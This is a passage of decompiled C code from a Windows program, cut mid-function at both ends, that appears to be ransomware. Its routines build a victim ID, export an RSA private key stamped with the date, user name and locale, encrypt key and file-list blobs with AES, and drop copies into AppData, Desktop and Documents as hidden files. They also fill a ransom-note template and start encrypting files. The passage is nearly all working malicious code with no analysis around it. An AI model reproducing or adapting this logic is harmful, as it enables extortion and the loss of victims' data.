  if ( CryptCreateHash(hProv, 0x8003u, 0, 0, &phHash) )
  {
    pdwDataLen = 16;
    v2 = lstrlenA(lpString);
    if ( CryptHashData(phHash, (const BYTE *)lpString, v2, 0) && CryptGetHashParam(phHash, 2u, &pbData, &pdwDataLen, 0) )
    {
      v1 = (WCHAR *)LocalAlloc(0x40u, 0xB4u);
      if ( v1 != nullptr )
      {
        GetLocaleInfoW(0x400u, 7u, LCData, 16);
        LCData[2] = 0;
        wsprintfW(v1, aS02x01x01x01x, LCData, pbData, v16 >> 4, v16 & 0xF, v17 >> 4);
        wsprintfA(
          v13,
          "%u|%u|%u|%u|%u|%u",
          dword_405E90,
          dword_405E94,
          dword_405E98,
          dword_405E9C,
          dword_405EA0,
          dword_405EA4);
        v3 = 8;
        v4 = 2;
        if ( v13[0] == 0 )
          goto LABEL_26;
        v5 = v13;
        do
        {
          if ( v4 == 5 )
          {
            v4 = 0;
            v1[v3++] = 45;
          }
          v6 = (unsigned __int8)*v5;
          if ( v6 <= 0x7C )
          {
            if ( v6 == 124 )
            {
              v12 = 84;
LABEL_23:
              v1[v3] = v12;
            }
            else
            {
              switch ( *v5 )
              {
                case '0':
                  v12 = 90;
                  goto LABEL_23;
                case '1':
                  v12 = 88;
                  goto LABEL_23;
                case '2':
                  v12 = 82;
                  goto LABEL_23;
                case '3':
                  v12 = 79;
                  goto LABEL_23;
                case '4':
                  v12 = 65;
                  goto LABEL_23;
                case '5':
                  v12 = 72;
                  goto LABEL_23;
                case '6':
                  v12 = 70;
                  goto LABEL_23;
                case '7':
                  v12 = 71;
                  goto LABEL_23;
                case '8':
                  v12 = 69;
                  goto LABEL_23;
                case '9':
                  v12 = 75;
                  goto LABEL_23;
                default:
                  break;
              }
            }
          }
          ++v4;
          ++v3;
          ++v5;
        }
        while ( *v5 != 0 );
        if ( v4 < 5 )
        {
LABEL_26:
          v7 = &v1[v3];
          v8 = (5 - v4) >> 1;
          memset32(v7, 5832793, v8);
          v9 = &v7[2 * v8];
          for ( i = (5 - (_BYTE)v4) & 1; i != 0; --i )
            *v9++ = 89;
        }
      }
    }
    CryptDestroyHash(phHash);
  }
  return v1;
}
// 405E90: using guessed type int dword_405E90;
// 405E94: using guessed type int dword_405E94;
// 405E98: using guessed type int dword_405E98;
// 405E9C: using guessed type int dword_405E9C;
// 405EA0: using guessed type int dword_405EA0;
// 405EA4: using guessed type int dword_405EA4;

//----- (00403E11) --------------------------------------------------------
CHAR *__stdcall sub_403E11(HCRYPTKEY hKey)
{
  BYTE *v1; // eax
  CHAR *v2; // eax
  CHAR *v3; // eax
  CHAR *v4; // edi
  CHAR *v5; // edi
  CHAR *v6; // edi
  CHAR *v7; // edi
  CHAR *v8; // edi
  int v9; // eax
  struct _SYSTEMTIME SystemTime; // [esp+8h] [ebp-20h] BYREF
  CHAR *v12; // [esp+18h] [ebp-10h]
  BYTE *pbBinary; // [esp+1Ch] [ebp-Ch]
  DWORD pcchString; // [esp+20h] [ebp-8h] BYREF
  DWORD pdwDataLen; // [esp+24h] [ebp-4h] BYREF
  CHAR *hKeya; // [esp+30h] [ebp+8h]

  v12 = nullptr;
  if ( CryptExportKey(hKey, 0, 7u, 0, nullptr, &pdwDataLen) )
  {
    v1 = (BYTE *)LocalAlloc(0x40u, pdwDataLen);
    pbBinary = v1;
    if ( v1 != nullptr )
    {
      CryptExportKey(hKey, 0, 7u, 0, v1, &pdwDataLen);
      if ( CryptBinaryToStringW(pbBinary, pdwDataLen, 1u, nullptr, &pcchString) )
      {
        v2 = (CHAR *)LocalAlloc(0x40u, pcchString);
        hKeya = v2;
        if ( v2 != nullptr )
        {
          CryptBinaryToStringA(pbBinary, pdwDataLen, 1u, v2, &pcchString);
          v3 = (CHAR *)LocalAlloc(0x40u, pcchString + 702);
          v4 = v3;
          v12 = v3;
          if ( v3 != nullptr )
          {
            lstrcpyA(v3, aBeginRsaPrivat);
            lstrcatA(v4, hKeya);
            lstrcatA(v4, aEndRsaPrivateK);
            v5 = &v12[lstrlenA(v4)];
            GetLocalTime(&SystemTime);
            v6 = &v5[wsprintfA(v5, "%02hu.%02hu.%04hu|", SystemTime.wDay, SystemTime.wMonth, SystemTime.wYear)];
            pdwDataLen = 257;
            GetUserNameA(v6, &pdwDataLen);
            lstrcatA(v6, asc_403300);
            v7 = &v6[lstrlenA(v6)];
            GetLocaleInfoA(0x400u, 7u, v7, 9);
            lstrcatA(v7, asc_403300);
            v8 = &v7[lstrlenA(v7)];
            lstrcatA(v8, &byte_4011D4);
            lstrcatA(v8, asc_403300);
            v9 = lstrlenA(v8);
            wsprintfA(
              &v8[v9],
              "%u|%u|%u|%u|%u|%u",
              dword_405E90,
              dword_405E94,
              dword_405E98,
              dword_405E9C,
              dword_405EA0,
              dword_405EA4);
          }
          LocalFree(hKeya);
        }
      }
      LocalFree(pbBinary);
    }
  }
  return v12;
}
// 405E90: using guessed type int dword_405E90;
// 405E94: using guessed type int dword_405E94;
// 405E98: using guessed type int dword_405E98;
// 405E9C: using guessed type int dword_405E9C;
// 405EA0: using guessed type int dword_405EA0;
// 405EA4: using guessed type int dword_405EA4;

//----- (00403FB3) --------------------------------------------------------
void __stdcall sub_403FB3(int a1, int a2, LPCWSTR lpExistingFileName, LPCWSTR lpString)
{
  int v4; // eax
  WCHAR *v5; // eax
  WCHAR *v6; // esi

  if ( a2 == 3 )
  {
    v4 = lstrlenW(lpString);
    v5 = (WCHAR *)LocalAlloc(0x40u, 2 * v4 + 16);
    v6 = v5;
    if ( v5 != nullptr )
    {
      wsprintfW(v5, aSSKey, a1, lpString);
      CopyFileW(lpExistingFileName, v6, false);
      LocalFree(v6);
    }
  }
}

//----- (00404006) --------------------------------------------------------
int __stdcall sub_404006(CHAR *lpString, int a2)
{
  WCHAR *v2; // eax
  WCHAR *v3; // edi
  int v4; // eax
  HANDLE FileW; // eax
  WCHAR *v6; // ebx
  int v7; // eax
  BYTE pbData[128]; // [esp+4h] [ebp-2Ch] BYREF
  int csidl[2]; // [esp+84h] [ebp+54h]
  int v11; // [esp+8Ch] [ebp+5Ch]
  DWORD nNumberOfBytesToWrite; // [esp+90h] [ebp+60h] BYREF
  HANDLE hFile; // [esp+94h] [ebp+64h]
  HCRYPTKEY phKey; // [esp+98h] [ebp+68h] BYREF
  DWORD pdwDataLen; // [esp+9Ch] [ebp+6Ch] BYREF
  LPCSTR lpStringa; // [esp+A8h] [ebp+78h]

  v11 = 0;
  csidl[0] = 21;
  csidl[1] = 0;
  if ( CryptGenKey(hProv, 0x6610u, 0x1000001u, &phKey) )
  {
    pdwDataLen = 128;
    if ( CryptExportKey(phKey, 0, 8u, 0, pbData, &pdwDataLen) )
    {
      CryptEncrypt(::phKey, 0, true, 0, pbData, &pdwDataLen, 0x80u);
      nNumberOfBytesToWrite = (lstrlenA(lpString) & 0xFFFFFFE0) + 32;
      if ( CryptEncrypt(phKey, 0, false, 0, (BYTE *)lpString, &nNumberOfBytesToWrite, nNumberOfBytesToWrite) )
      {
        v2 = (WCHAR *)LocalAlloc(0x40u, 0x800u);
        v3 = v2;
        if ( v2 != nullptr )
        {
          SHGetSpecialFolderPathW(nullptr, v2, 26, false);
          v4 = lstrlenW(v3);
          wsprintfW(&v3[v4], aSKey, a2);
          FileW = CreateFileW(v3, 0x40000000u, 0, nullptr, 1u, 3u, nullptr);
          hFile = FileW;
          if ( FileW != (HANDLE)-1 )
          {
            if ( WriteFile(FileW, lpString, nNumberOfBytesToWrite, &pdwDataLen, nullptr)
              && pdwDataLen == nNumberOfBytesToWrite
              && WriteFile(hFile, pbData, 0x80u, &pdwDataLen, nullptr)
              && pdwDataLen == 128 )
            {
              CloseHandle(hFile);
              v11 = 1;
              sub_4038B1((int (__stdcall *)(wchar_t *, UINT, int, int))sub_403FB3, (int)v3, a2);
              v6 = (WCHAR *)LocalAlloc(0x40u, 0x800u);
              if ( v6 != nullptr )
              {
                for ( lpStringa = nullptr; (unsigned int)lpStringa < 2; ++lpStringa )
                {
                  if ( SHGetSpecialFolderPathW(nullptr, v6, csidl[(_DWORD)lpStringa], false) )
                  {
                    v7 = lstrlenW(v6);
                    wsprintfW(&v6[v7], aSKey, a2);
                    CopyFileW(v3, v6, false);
                  }
                }
                LocalFree(v6);
              }
            }
            else
            {
              CloseHandle(hFile);
            }
          }
          LocalFree(v3);
        }
      }
    }
    CryptDestroyKey(phKey);
  }
  return v11;
}

//----- (004041FD) --------------------------------------------------------
void __stdcall sub_4041FD(int a1, int a2, LPCWSTR lpString, int a4)
{
  int v4; // eax
  WCHAR *v5; // eax
  WCHAR *v6; // esi

  if ( a2 == 3 )
  {
    v4 = lstrlenW(lpString);
    v5 = (WCHAR *)LocalAlloc(0x40u, 2 * v4 + 16);
    v6 = v5;
    if ( v5 != nullptr )
    {
      wsprintfW(v5, aSSKey, a1, lpString);
      SetFileAttributesW(v6, 0x21u);
      LocalFree(v6);
    }
  }
}

//----- (0040424D) --------------------------------------------------------
WCHAR *__stdcall sub_40424D(int a1)
{
  WCHAR *result; // eax
  WCHAR *v2; // esi
  unsigned int i; // edi
  int v4; // eax
  int csidl[3]; // [esp+4h] [ebp-Ch]

  csidl[2] = 0;
  csidl[0] = 26;
  csidl[1] = 21;
  result = (WCHAR *)LocalAlloc(0x40u, 0x800u);
  v2 = result;
  if ( result != nullptr )
  {
    sub_4038B1((int (__stdcall *)(wchar_t *, UINT, int, int))sub_4041FD, a1, 0);
    for ( i = 0; i < 3; ++i )
    {
      SHGetSpecialFolderPathW(nullptr, v2, csidl[i], false);
      v4 = lstrlenW(v2);
      wsprintfW(&v2[v4], aSKey, a1);
      SetFileAttributesW(v2, 0x21u);
    }
    return (WCHAR *)LocalFree(v2);
  }
  return result;
}

//----- (004042D2) --------------------------------------------------------
LPSTR __stdcall sub_4042D2(BYTE *pbBinary)
{
  WCHAR *v1; // eax
  WCHAR *v2; // edi
  int v3; // eax
  HANDLE FileW; // eax
  SIZE_T FileSize; // edi
  BYTE *v6; // eax
  LPSTR v7; // esi
  int v8; // edi
  LPSTR v9; // eax
  WCHAR *v11; // [esp+Ch] [ebp-18h]
  DWORD NumberOfBytesRead; // [esp+14h] [ebp-10h] BYREF
  HANDLE hFile; // [esp+18h] [ebp-Ch]
  DWORD pcchString; // [esp+1Ch] [ebp-8h] BYREF
  LPSTR pszString; // [esp+20h] [ebp-4h]
  BYTE *pbBinarya; // [esp+2Ch] [ebp+8h]

  pszString = nullptr;
  v1 = (WCHAR *)LocalAlloc(0x40u, 0x800u);
  v2 = v1;
  v11 = v1;
  if ( v1 != nullptr )
  {
    SHGetSpecialFolderPathW(nullptr, v1, 26, false);
    v3 = lstrlenW(v2);
    wsprintfW(&v2[v3], aSKey, pbBinary);
    FileW = CreateFileW(v2, 0x80000000, 1u, nullptr, 3u, 0x80u, nullptr);
    hFile = FileW;
    if ( FileW != (HANDLE)-1 )
    {
      FileSize = GetFileSize(FileW, nullptr);
      v6 = (BYTE *)LocalAlloc(0x40u, FileSize);
      pbBinarya = v6;
      if ( v6 != nullptr )
      {
        if ( ReadFile(hFile, v6, FileSize, &NumberOfBytesRead, nullptr)
          && NumberOfBytesRead == FileSize
          && CryptBinaryToStringA(pbBinarya, FileSize, 1u, nullptr, &pcchString) )
        {
          pszString = (LPSTR)LocalAlloc(0x40u, pcchString);
          if ( pszString != nullptr )
          {
            v7 = pszString;
            CryptBinaryToStringA(pbBinarya, FileSize, 1u, pszString, &pcchString);
            v8 = 0;
            if ( *v7 != 0 )
            {
              v9 = v7;
              do
              {
                if ( *v9 == 13 )
                  v9 += 2;
                v7[v8++] = *v9++;
              }
              while ( *v9 != 0 );
            }
            v7[v8] = 0;
          }
        }
        LocalFree(pbBinarya);
      }
      CloseHandle(hFile);
      v2 = v11;
    }
    LocalFree(v2);
  }
  return pszString;
}

//----- (004043F2) --------------------------------------------------------
_BYTE *__stdcall sub_4043F2(LPCWSTR lpString)
{
  int v1; // eax
  _BYTE *result; // eax
  int v3; // edx
  const WCHAR *v4; // ecx

  v1 = lstrlenW(lpString);
  result = LocalAlloc(0x40u, v1 + 1);
  if ( result != nullptr )
  {
    v3 = 0;
    if ( *lpString != 0 )
    {
      v4 = lpString;
      do
      {
        result[v3++] = *(_BYTE *)v4;
        v4 = &lpString[v3];
      }
      while ( *v4 != 0 );
    }
  }
  return result;
}

//----- (00404428) --------------------------------------------------------
CHAR *__stdcall sub_404428(LPCSTR lpString, PCSTR pszSrch, LPCSTR lpString2)
{
  int v4; // ebx
  int v5; // eax
  CHAR *v6; // ebx
  int v7; // eax
  LPCSTR lpStringa; // [esp+14h] [ebp+8h]

  v4 = lstrlenA(lpString);
  v5 = lstrlenA(lpString2);
  v6 = (CHAR *)LocalAlloc(0x40u, v5 + v4);
  if ( v6 != nullptr )
  {
    lpStringa = StrStrA(lpString, pszSrch);
    dword_405EB8(v6, lpString, lpStringa - lpString);
    lstrcatA(v6, lpString2);
    v7 = lstrlenA(pszSrch);
    lstrcatA(v6, &lpStringa[v7]);
  }
  return v6;
}
// 405EB8: using guessed type int (__cdecl *dword_405EB8)(_DWORD, _DWORD, _DWORD);

//----- (0040448D) --------------------------------------------------------
void __stdcall sub_40448D(int a1, int a2, LPCWSTR lpExistingFileName, LPCWSTR lpString)
{
  int v4; // eax
  WCHAR *v5; // eax
  WCHAR *v6; // esi

  if ( a2 == 3 )
  {
    v4 = lstrlenW(lpString);
    v5 = (WCHAR *)LocalAlloc(0x40u, 2 * v4 + 16);
    v6 = v5;
    if ( v5 != nullptr )
    {
      wsprintfW(v5, aSSS, a1, lpString, off_4011F4);
      CopyFileW(lpExistingFileName, v6, false);
      LocalFree(v6);
    }
  }
}
// 4011F4: using guessed type wchar_t *off_4011F4;

//----- (004044E6) --------------------------------------------------------
int __stdcall sub_4044E6(BYTE *pbBinary)
{
  int v1; // eax
  CHAR *v2; // eax
  CHAR *v3; // ebx
  CHAR *v4; // edi
  CHAR *v5; // edi
  WCHAR *v6; // eax
  WCHAR *v7; // esi
  int v8; // eax
  HANDLE FileW; // edi
  WCHAR *v10; // edi
  int v11; // eax
  wchar_t *v13; // [esp-8h] [ebp-2Ch]
  wchar_t *v14; // [esp-8h] [ebp-2Ch]
  CHAR *hMem; // [esp+Ch] [ebp-18h]
  CHAR *hMema; // [esp+Ch] [ebp-18h]
  HLOCAL hMemb; // [esp+Ch] [ebp-18h]
  unsigned int hMemc; // [esp+Ch] [ebp-18h]
  int v19; // [esp+10h] [ebp-14h]
  DWORD NumberOfBytesWritten; // [esp+14h] [ebp-10h] BYREF
  int csidl[3]; // [esp+18h] [ebp-Ch]

  v19 = 0;
  csidl[0] = 21;
  csidl[1] = 0;
  csidl[2] = 7;
  v1 = lstrlenA(&String);
  v2 = (CHAR *)LocalAlloc(0x40u, v1 + 1);
  v3 = v2;
  if ( v2 != nullptr )
  {
    lstrcpyA(v2, &String);
    v4 = sub_4043F2((LPCWSTR)pbBinary);
    if ( v4 != nullptr )
    {
      while ( StrStrA(v3, pszSrch) != nullptr )
      {
        hMem = sub_404428(v3, pszSrch, v4);
        if ( hMem != nullptr )
        {
          LocalFree(v3);
          v3 = hMem;
        }
      }
      LocalFree(v4);
    }
    hMema = sub_4042D2(pbBinary);
    if ( hMema != nullptr )
    {
      while ( StrStrA(v3, aData) != nullptr )
      {
        v5 = sub_404428(v3, aData, hMema);
        if ( v5 != nullptr )
        {
          LocalFree(v3);
          v3 = v5;
        }
      }
      LocalFree(hMema);
    }
    v6 = (WCHAR *)LocalAlloc(0x40u, 0x800u);
    v7 = v6;
    if ( v6 != nullptr )
    {
      SHGetSpecialFolderPathW(nullptr, v6, 26, false);
      v13 = off_4011F4;
      v8 = lstrlenW(v7);
      wsprintfW(&v7[v8], aSS, pbBinary, v13);
      SetFileAttributesW(v7, 0x80u);
      FileW = CreateFileW(v7, 0x40000000u, 0, nullptr, 2u, 0x21u, nullptr);
      if ( FileW != (HANDLE)-1 )
      {
        hMemb = (HLOCAL)lstrlenA(v3);
        if ( WriteFile(FileW, v3, (DWORD)hMemb, &NumberOfBytesWritten, nullptr) && (HLOCAL)NumberOfBytesWritten == hMemb )
        {
          v19 = 1;
          CloseHandle(FileW);
          sub_4038B1((int (__stdcall *)(wchar_t *, UINT, int, int))sub_40448D, (int)v7, (int)pbBinary);
          v10 = (WCHAR *)LocalAlloc(0x40u, 0x800u);
          if ( v10 != nullptr )
          {
            for ( hMemc = 0; hMemc < 3; ++hMemc )
            {
              if ( SHGetSpecialFolderPathW(nullptr, v10, csidl[hMemc], false) )
              {
                v14 = off_4011F4;
                v11 = lstrlenW(v10);
                wsprintfW(&v10[v11], aSS, pbBinary, v14);
                CopyFileW(v7, v10, false);
              }
            }
            LocalFree(v10);
          }
        }
        else
        {
          CloseHandle(FileW);
        }
      }
      LocalFree(v7);
    }
    LocalFree(v3);
  }
  return v19;
}
// 4011F4: using guessed type wchar_t *off_4011F4;

//----- (00404700) --------------------------------------------------------
void __stdcall sub_404700(int a1, int a2, LPCWSTR lpExistingFileName, LPCWSTR lpString)
{
  int v4; // eax
  WCHAR *v5; // eax
  WCHAR *v6; // esi

  if ( a2 == 3 )
  {
    v4 = lstrlenW(lpString);
    v5 = (WCHAR *)LocalAlloc(0x40u, 2 * v4 + 16);
    v6 = v5;
    if ( v5 != nullptr )
    {
      wsprintfW(v5, aSSLst, a1, lpString);
      CopyFileW(lpExistingFileName, v6, false);
      LocalFree(v6);
    }
  }
}

//----- (00404753) --------------------------------------------------------
int __stdcall sub_404753(int a1, HCRYPTKEY hKey)
{
  WCHAR *v2; // ebx
  HRESULT (__stdcall **p_Write)(IStream *, const void *, ULONG, ULONG *); // edi
  int v4; // eax
  const WCHAR *v5; // eax
  int v6; // eax
  HLOCAL v7; // eax
  int v8; // eax
  HANDLE FileW; // eax
  WCHAR *v10; // eax
  WCHAR *v11; // edi
  int v12; // eax
  BYTE pbData[128]; // [esp+8h] [ebp-34h] BYREF
  LPCWCH lpWideCharStr; // [esp+88h] [ebp+4Ch]
  int cbMultiByte; // [esp+8Ch] [ebp+50h]
  int v17; // [esp+90h] [ebp+54h]
  HGLOBAL phglobal; // [esp+94h] [ebp+58h] BYREF
  HCRYPTKEY phKey; // [esp+98h] [ebp+5Ch] BYREF
  LPCVOID lpBuffer; // [esp+9Ch] [ebp+60h]
  DWORD dwBufLen; // [esp+A0h] [ebp+64h] BYREF
  LPSTREAM ppstm; // [esp+A4h] [ebp+68h] BYREF
  DWORD pdwDataLen; // [esp+A8h] [ebp+6Ch] BYREF
  void *hKeya; // [esp+B8h] [ebp+7Ch]

  v17 = 0;
  v2 = (WCHAR *)LocalAlloc(0x40u, 0x800u);
  if ( v2 != nullptr )
  {
    if ( CreateStreamOnHGlobal(nullptr, true, &ppstm) == 0 )
    {
      if ( sub_403BCC(v2) )
      {
        do
        {
          p_Write = &ppstm->lpVtbl->Write;
          v4 = lstrlenW(v2);
          (*p_Write)(ppstm, v2, 2 * v4, &pdwDataLen);
          ppstm->lpVtbl->Write(ppstm, asc_4033DC, 4, &pdwDataLen);
        }
        while ( sub_403B5D(v2) );
        ppstm->lpVtbl->Write(ppstm, &dword_4033D8, 2, &pdwDataLen);
        if ( GetHGlobalFromStream(ppstm, &phglobal) == 0 )
        {
          v5 = (const WCHAR *)GlobalLock(phglobal);
          lpWideCharStr = v5;
          if ( v5 != nullptr )
          {
            v6 = WideCharToMultiByte(0xFDE9u, 0, v5, -1, nullptr, 0, nullptr, nullptr);
            cbMultiByte = v6;
            if ( v6 != 0 )
            {
              v7 = LocalAlloc(0x40u, v6 + 32);
              lpBuffer = v7;
              if ( v7 != nullptr )
              {
                WideCharToMultiByte(0xFDE9u, 0, lpWideCharStr, -1, (LPSTR)v7, cbMultiByte, nullptr, nullptr);
                if ( CryptGenKey(hProv, 0x6610u, 1u, &phKey) )
                {
                  dwBufLen = (cbMultiByte & 0xFFFFFFE0) + 32;
                  pdwDataLen = 128;
                  if ( CryptExportKey(phKey, 0, 8u, 0, pbData, &pdwDataLen)
                    && CryptEncrypt(hKey, 0, true, 0, pbData, &pdwDataLen, 0x80u)
                    && CryptEncrypt(phKey, 0, false, 0, (BYTE *)lpBuffer, &dwBufLen, dwBufLen) )
                  {
                    SHGetSpecialFolderPathW(nullptr, v2, 26, false);
                    v8 = lstrlenW(v2);
                    wsprintfW(&v2[v8], aSLst, a1);
                    SetFileAttributesW(v2, 0x80u);
                    FileW = CreateFileW(v2, 0x40000000u, 0, nullptr, 2u, 0x21u, nullptr);
                    hKeya = FileW;
                    if ( FileW != (HANDLE)-1 )
                    {
                      if ( WriteFile(FileW, lpBuffer, dwBufLen, &pdwDataLen, nullptr)
                        && pdwDataLen == dwBufLen
                        && WriteFile(hKeya, pbData, 0x80u, &pdwDataLen, nullptr)
                        && pdwDataLen == 128 )
                      {
                        v17 = 1;
                        CloseHandle(hKeya);
                        sub_4038B1((int (__stdcall *)(wchar_t *, UINT, int, int))sub_404700, (int)v2, a1);
                        v10 = (WCHAR *)LocalAlloc(0x40u, 0x800u);
                        v11 = v10;
                        if ( v10 != nullptr )
                        {
                          if ( SHGetSpecialFolderPathW(nullptr, v10, 21, false) )
                          {
                            v12 = lstrlenW(v11);
                            wsprintfW(&v11[v12], aSLst, a1);
                            CopyFileW(v2, v11, false);
                          }
                          LocalFree(v11);
                        }
                      }
                      else
                      {
                        CloseHandle(hKeya);
                      }
                    }
                  }
                  CryptDestroyKey(phKey);
                }
                LocalFree((HLOCAL)lpBuffer);
              }
            }
            GlobalUnlock(phglobal);
          }
        }
      }
      ppstm->lpVtbl->Release(ppstm);
    }
    LocalFree(v2);
  }
  return v17;
}
// 4033D8: using guessed type int dword_4033D8;
// 4033DC: using guessed type wchar_t asc_4033DC[3];

//----- (00404A2C) --------------------------------------------------------
int __stdcall sub_404A2C(int a1)
{
  LONG Buffer; // [esp+8h] [ebp-8h] BYREF
  DWORD NumberOfBytesRead; // [esp+Ch] [ebp-4h] BYREF

  if ( SetFilePointer(hObject, 0, nullptr, 0) == -1 )
    return 0;
  if ( a1 != 0 )
  {
    while ( ReadFile(hObject, &Buffer, 4u, &NumberOfBytesRead, nullptr)
         && NumberOfBytesRead == 4
         && SetFilePointer(hObject, Buffer, nullptr, 1u) != -1 )
    {
      if ( --a1 == 0 )
        return 1;
    }
    return 0;
  }
  return 1;
}

//----- (00404A96) --------------------------------------------------------
BYTE *__stdcall sub_404A96(DWORD NumberOfBytesRead)
{
  BYTE *pbData; // edi
  BYTE *v2; // eax
  DATA_BLOB pDataOut; // [esp+4h] [ebp-10h] BYREF
  DATA_BLOB Buffer; // [esp+Ch] [ebp-8h] BYREF

  pbData = nullptr;
  if ( sub_404A2C(NumberOfBytesRead) != 0
    && ReadFile(hObject, &Buffer, 4u, &NumberOfBytesRead, nullptr)
    && NumberOfBytesRead == 4 )
  {
    v2 = (BYTE *)LocalAlloc(0x40u, Buffer.cbData);
    Buffer.pbData = v2;
    if ( v2 != nullptr )
    {
      if ( ReadFile(hObject, v2, Buffer.cbData, &NumberOfBytesRead, nullptr)
        && NumberOfBytesRead == Buffer.cbData
        && CryptUnprotectData(&Buffer, nullptr, &pOptionalEntropy, nullptr, nullptr, 1u, &pDataOut) )
      {
        pbData = pDataOut.pbData;
      }
      LocalFree(Buffer.pbData);
    }
  }
  return pbData;
}

//----- (00404B2E) --------------------------------------------------------
BOOL __stdcall sub_404B2E(DWORD NumberOfBytesWritten, BYTE *a2, DWORD a3)
{
  BOOL v3; // edi
  DATA_BLOB pDataIn; // [esp+4h] [ebp-10h] BYREF
  DATA_BLOB pDataOut; // [esp+Ch] [ebp-8h] BYREF

  v3 = false;
  if ( sub_404A2C(NumberOfBytesWritten) != 0 )
  {
    pDataIn.pbData = a2;
    pDataIn.cbData = a3;
    if ( CryptProtectData(&pDataIn, nullptr, &pOptionalEntropy, nullptr, nullptr, 5u, &pDataOut) )
    {
      if ( WriteFile(hObject, &pDataOut, 4u, &NumberOfBytesWritten, nullptr)
        && NumberOfBytesWritten == 4
        && WriteFile(hObject, pDataOut.pbData, pDataOut.cbData, &NumberOfBytesWritten, nullptr) )
      {
        v3 = NumberOfBytesWritten == pDataOut.cbData;
      }
      LocalFree(pDataOut.pbData);
    }
  }
  return v3;
}

//----- (00404BC0) --------------------------------------------------------
BOOL __stdcall sub_404BC0(int a1)
{
  return sub_404B2E(0, (BYTE *)&a1, 4u);
}

//----- (00404BD1) --------------------------------------------------------
int sub_404BD1()
{
  int v0; // esi
  BYTE *v1; // eax

  v0 = -1;
  v1 = sub_404A96(0);
  if ( v1 != nullptr )
  {
    v0 = *(_DWORD *)v1;
    LocalFree(v1);
  }
  return v0;
}

//----- (00404BED) --------------------------------------------------------
BOOL sub_404BED()
{
  BOOL v0; // edi
  BYTE *v1; // esi
  SIZE_T v2; // eax
  HGLOBAL phglobal; // [esp+4h] [ebp-4h] BYREF

  v0 = false;
  if ( GetHGlobalFromStream(ppstm, &phglobal) == 0 )
  {
    v1 = (BYTE *)GlobalLock(phglobal);
    if ( v1 != nullptr )
    {
      v2 = GlobalSize(phglobal);
      v0 = sub_404B2E(1u, v1, v2);
      GlobalUnlock(v1);
    }
  }
  return v0;
}

//----- (00404C3C) --------------------------------------------------------
LPSTREAM sub_404C3C()
{
  BYTE *v0; // edi
  struct IStreamVtbl *lpVtbl; // esi
  SIZE_T v2; // eax
  ULONG v4; // [esp+4h] [ebp-8h] BYREF
  LPSTREAM ppstm; // [esp+8h] [ebp-4h] BYREF

  ppstm = nullptr;
  v0 = sub_404A96(1u);
  if ( v0 != nullptr )
  {
    if ( CreateStreamOnHGlobal(nullptr, true, &ppstm) == 0 )
    {
      lpVtbl = ppstm->lpVtbl;
      v2 = LocalSize(v0);
      if ( lpVtbl->Write(ppstm, v0, v2, &v4) != 0 )
      {
        ppstm->lpVtbl->Release(ppstm);
        ppstm = nullptr;
      }
    }
    LocalFree(v0);
  }
  return ppstm;
}

//----- (00404C9D) --------------------------------------------------------
BOOL __stdcall sub_404C9D(HCRYPTKEY hKey)
{
  BOOL v1; // edi
  BYTE *v2; // ebx
  DWORD pdwDataLen; // [esp+8h] [ebp-4h] BYREF

  v1 = false;
  if ( CryptExportKey(hKey, 0, 6u, 0, nullptr, &pdwDataLen) )
  {
    v2 = (BYTE *)LocalAlloc(0x40u, pdwDataLen);
    if ( v2 != nullptr )
    {
      CryptExportKey(hKey, 0, 6u, 0, v2, &pdwDataLen);
      v1 = sub_404B2E(2u, v2, pdwDataLen);
      LocalFree(v2);
    }
  }
  return v1;
}

//----- (00404CFD) --------------------------------------------------------
HCRYPTKEY sub_404CFD()
{
  BYTE *v0; // esi
  SIZE_T v1; // eax
  HCRYPTKEY phKey; // [esp+4h] [ebp-4h] BYREF

  phKey = 0;
  v0 = sub_404A96(2u);
  if ( v0 != nullptr )
  {
    v1 = LocalSize(v0);
    CryptImportKey(hProv, v0, v1, 0, 0, &phKey);
    LocalFree(v0);
  }
  return phKey;
}

//----- (00404D3D) --------------------------------------------------------
int sub_404D3D()
{
  BYTE *v0; // eax
  DWORD pcbBinary; // [esp+Ch] [ebp-14h] BYREF
  BYTE *pbEncoded; // [esp+10h] [ebp-10h]
  DWORD pcbStructInfo; // [esp+14h] [ebp-Ch] BYREF
  int v5; // [esp+18h] [ebp-8h]
  struct _CERT_PUBLIC_KEY_INFO *pvStructInfo; // [esp+1Ch] [ebp-4h] BYREF

  v5 = 0;
  pvStructInfo = nullptr;
  if ( CryptStringToBinaryA((LPCSTR)pszString, 0, 0, nullptr, &pcbBinary, nullptr, nullptr) )
  {
    v0 = (BYTE *)LocalAlloc(0x40u, pcbBinary);
    pbEncoded = v0;
    if ( v0 != nullptr )
    {
      CryptStringToBinaryA((LPCSTR)pszString, 0, 0, v0, &pcbBinary, nullptr, nullptr);
      pcbStructInfo = 0;
      if ( CryptDecodeObjectEx(1u, (LPCSTR)8, pbEncoded, pcbBinary, 0x8000u, nullptr, &pvStructInfo, &pcbStructInfo) )
      {
        if ( CryptImportPublicKeyInfo(hProv, 1u, pvStructInfo, &phKey) )
          v5 = 1;
        LocalFree(pvStructInfo);
      }
      LocalFree(pbEncoded);
    }
  }
  return v5;
}

//----- (00404DE2) --------------------------------------------------------
int __stdcall sub_404DE2(LPCWSTR lpFileName)
{
  DWORD FileAttributesW; // eax
  HANDLE FileW; // ebx
  int v3; // eax
  HANDLE FileMappingW; // eax
  BYTE Buffer[128]; // [esp+4h] [ebp-28h] BYREF
  HANDLE hObject; // [esp+84h] [ebp+58h]
  DWORD FileSizeHigh; // [esp+88h] [ebp+5Ch] BYREF
  int v9; // [esp+8Ch] [ebp+60h]
  int v10; // [esp+90h] [ebp+64h] BYREF
  HCRYPTKEY phKey; // [esp+94h] [ebp+68h] BYREF
  DWORD dwMaximumSizeLow; // [esp+98h] [ebp+6Ch] BYREF
  DWORD NumberOfBytesRead; // [esp+9Ch] [ebp+70h] BYREF
  DWORD lpFileNamea; // [esp+A8h] [ebp+7Ch]
  BYTE *lpFileNameb; // [esp+A8h] [ebp+7Ch]

  v9 = 0;
  FileAttributesW = GetFileAttributesW(lpFileName);
  if ( FileAttributesW != -1 )
  {
    if ( (FileAttributesW & 1) != 0 )
      SetFileAttributesW(lpFileName, FileAttributesW & 0xFFFFFFFE);
    FileW = CreateFileW(lpFileName, 0xC0000000, 1u, nullptr, 3u, 0x80u, nullptr);
    if ( FileW != (HANDLE)-1 )
    {
      FileSizeHigh = 0;
      lpFileNamea = GetFileSize(FileW, &FileSizeHigh);
      if ( lpFileNamea >= 0x20
        && SetFilePointer(FileW, -132, nullptr, 2u) != -1
        && ReadFile(FileW, Buffer, 0x80u, &NumberOfBytesRead, nullptr)
        && NumberOfBytesRead == 128
